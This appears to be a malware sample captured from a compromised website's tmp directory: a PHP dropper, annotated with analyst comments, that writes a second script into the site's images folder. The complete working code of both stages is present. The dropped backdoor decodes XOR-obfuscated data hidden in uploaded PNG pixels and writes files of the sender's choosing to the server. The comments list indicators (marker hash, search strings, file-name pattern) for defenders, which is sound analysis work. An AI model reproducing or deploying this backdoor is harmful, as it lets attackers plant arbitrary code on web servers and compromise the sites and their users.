| Current Path : /home/a/t/a/ataenra/www/tmp/ |
| Current File : /home/a/t/a/ataenra/www/tmp/sec-4088a59926.xml.php |
<?php
// Analyst note: this script is a first-stage dropper. It does no work of its own
// beyond writing a second PHP file (held in $code below) to disk and reporting
// whether the write succeeded.
//
// $root is the parent of the directory this script runs from. Going by the
// listing header on this page (script located under .../www/tmp/), that
// resolves to the site's www directory.
$root = dirname(__DIR__);
// Drop location: a .php file under the site's images/ directory. An executable
// script in a media directory is itself an indicator; denying PHP execution in
// images/, tmp/ and other writable directories makes a file dropped here inert.
// Both file names seen on this page follow the shape "sec-<10 hex chars>" and
// can be used as a search pattern during triage.
$target = $root . '/images/sec-3741bf48f8.php';
// Analyst note: $code is a complete PHP script stored as one single-quoted
// string; it is not executed here, only written to disk by the statement that
// follows. Read as code, the embedded script does the following:
//   - On a POST request carrying a file field named "image", it parses the
//     upload as a PNG: checks the 8-byte signature, requires colour type 6 with
//     bit depth 8, concatenates the IDAT chunks, inflates them with
//     gzuncompress(), and reverses the per-scanline filters (types 0-4,
//     including Paeth) to recover the raw pixel bytes.
//   - It treats those pixel bytes as a container: trailing zero bytes are
//     stripped, the first 4 bytes are read as a big-endian length, and that
//     many bytes are XORed with the single byte 0xAA.
//   - The decoded buffer is split on the literal markers "--NAME--" and
//     "--EXT--"; the name and extension parts are XORed with 0xAA once more
//     and concatenated into a file name.
//   - file_put_contents() then writes the content part to that name. Nothing
//     in the script validates the name, the extension or the directory, so the
//     sender of the image chooses both the path and the contents of the file.
//   - Any other request gets "hello world" followed by an HTML comment holding
//     a fixed 32-hex-character marker.
// Defensive relevance: the payload travels inside valid PNG pixel data, so
// upload checks that only confirm "this is an image" do not see it. Useful
// search strings when sweeping a web root or response logs: "--NAME--",
// "--EXT--", "Extracted bytes count:", "File decoded successfully:", and the
// marker 46f94c8de14fb36680850768ff1b7f2a.
// NOTE(review): the line breaks inside the literal are part of the string as
// shown here; they may be an artefact of how this page was captured — confirm
// against the file on disk before hashing or signature matching.
$code = '<?php function xor_cipher($data) { $result = \'\'; for ($i = 0; $i < strlen($data); $i++) { $result .= chr(ord($data[$i]) ^ 0xAA); } return $result; } function paeth_predictor($a, $b, $c) { $p = $a + $b - $c; $pa = abs($p - $a); $pb = abs($p - $b); $pc = abs($p - $c); if ($pa <= $pb && $pa <= $pc) return $a; elseif ($pb <= $pc) return $b; else return $c; } function reconstruct_line($line, $filter, $prev_line = \'\', $bpp = 4) { $recon = \'\'; $len = strlen($line); for ($i = 0; $i < $len; $i++) { $curr = ord($line[$i]); if ($filter == 0) { $recon .= chr($curr); } elseif ($filter == 1) { $left = ($i >= $bpp) ? ord($recon[$i - $bpp]) : 0; $recon .= chr(($curr + $left) % 256); } elseif ($filter == 2) { $above = ($prev_line != \'\') ? ord($prev_line[$i]) : 0; $recon .= chr(($curr + $above) % 256); } elseif ($filter == 3) { $left = ($i >= $bpp) ? ord($recon[$i - $bpp]) : 0; $above = ($prev_line != \'\') ? ord($prev_line[$i]) : 0; $recon .= chr(($curr + floor(($left + $above) / 2)) % 256); } elseif ($filter == 4) { $left = ($i >= $bpp) ? ord($recon[$i - $bpp]) : 0; $above = ($prev_line != \'\') ? ord($prev_line[$i]) : 0; $up_left = ($i >= $bpp && $prev_line != \'\') ? 
ord($prev_line[$i - $bpp]) : 0; $recon .= chr(($curr + paeth_predictor($left, $above, $up_left)) % 256); } } return $recon; } function extract_png_bytes($file_path) { $file = fopen($file_path, \'rb\'); if (!$file) return false; $signature = fread($file, 8); if ($signature != "\\x89PNG\\r\\n\\x1A\\n") { fclose($file); return false; } $idat_data = \'\'; while (!feof($file)) { $chunk_length_data = fread($file, 4); if (strlen($chunk_length_data) < 4) break; $chunk_length = unpack(\'N\', $chunk_length_data)[1]; $chunk_type = fread($file, 4); if ($chunk_length == 0) { $chunk_data = \'\'; } else { $chunk_data = fread($file, $chunk_length); } $chunk_crc = fread($file, 4); if ($chunk_type == \'IHDR\') { $ihdr_data = unpack(\'Nwidth/Nheight/Cbit_depth/Ccolor_type/Ccompression/Cfilter/Cinterlace\', substr($chunk_data, 0, 13)); $width = $ihdr_data[\'width\']; $height = $ihdr_data[\'height\']; $bit_depth = $ihdr_data[\'bit_depth\']; $color_type = $ihdr_data[\'color_type\']; if ($color_type != 6 || $bit_depth != 8) { fclose($file); return false; } } elseif ($chunk_type == \'IDAT\') { $idat_data .= $chunk_data; } elseif ($chunk_type == \'IEND\') { break; } } fclose($file); $compressed_data = $idat_data; $decompressed = @gzuncompress($compressed_data); if ($decompressed === false) return false; $bytes = []; $filter_byte_length = $width * 4 + 1; $scanline_length = $width * 4; $prev_recon = str_repeat(chr(0), $scanline_length); for ($y = 0; $y < $height; $y++) { $line_start = $y * $filter_byte_length; $filter = ord($decompressed[$line_start]); $filtered_line = substr($decompressed, $line_start + 1, $scanline_length); $recon_line = reconstruct_line($filtered_line, $filter, $prev_recon, 4); for ($x = 0; $x < $scanline_length; $x += 4) { $r = ord($recon_line[$x]); $g = ord($recon_line[$x + 1]); $b = ord($recon_line[$x + 2]); $a = ord($recon_line[$x + 3]); $bytes[] = $r; $bytes[] = $g; $bytes[] = $b; $bytes[] = $a; } $prev_recon = $recon_line; } while (!empty($bytes) && 
$bytes[count($bytes) - 1] == 0) { array_pop($bytes); } echo "Extracted bytes count: " . count($bytes) . "<br>"; return $bytes; } if ($_SERVER[\'REQUEST_METHOD\'] === \'POST\' && isset($_FILES[\'image\'])) { $uploaded = $_FILES[\'image\']; $tmp_name = $uploaded[\'tmp_name\']; $bytes = extract_png_bytes($tmp_name); if ($bytes === false) { echo "Failed to extract bytes from image"; exit; } $full_data = \'\'; foreach ($bytes as $b) { $full_data .= chr($b); } $length = unpack(\'N\', substr($full_data, 0, 4))[1]; $encoded_content = substr($full_data, 4, $length); $decoded_content = xor_cipher($encoded_content); $parts = explode(\'--NAME--\', $decoded_content); if (count($parts) < 2) { echo "Invalid format"; exit; } $content = $parts[0]; $rest = $parts[1]; $ext_parts = explode(\'--EXT--\', $rest); if (count($ext_parts) < 2) { echo "Invalid format"; exit; } $encrypted_name = $ext_parts[0]; $encrypted_ext = $ext_parts[1]; $decoded_name = xor_cipher($encrypted_name); $decoded_ext = xor_cipher($encrypted_ext); $final_name = $decoded_name . $decoded_ext; file_put_contents($final_name, $content); echo "File decoded successfully: $final_name"; } else { echo "hello world<!-- 46f94c8de14fb36680850768ff1b7f2a -->"; } ?>';
// Analyst note: writes the string in $code to the path in $target. The @
// operator suppresses the PHP warning a failed write would otherwise raise, so
// the only feedback is the text echoed below.
if (@file_put_contents($target, $code) !== false) {
// Success path: the response body is the MD5 hex digest of the fixed string
// '123qwe', i.e. a constant 32-character token rather than anything derived
// from the request. NOTE(review): this looks like the same value as the
// 32-hex marker inside the "hello world" comment of the dropped script —
// confirm, then use it as a response-body indicator in proxy/WAF logs.
echo md5('123qwe');
} else {
// Failure path: a fixed literal, also usable as a log search string. Seeing it
// suggests the target directory was not writable by the web server user.
echo 'WRITE_FAILED';
}
?>